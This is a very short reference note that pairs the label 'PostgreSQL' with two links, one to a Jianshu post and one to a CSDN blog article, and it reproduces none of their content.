PostgreSQL: https://www.jianshu.com/p/ba0297da2c2e

https://blog.csdn.net/qq_36119192/article/details/104628797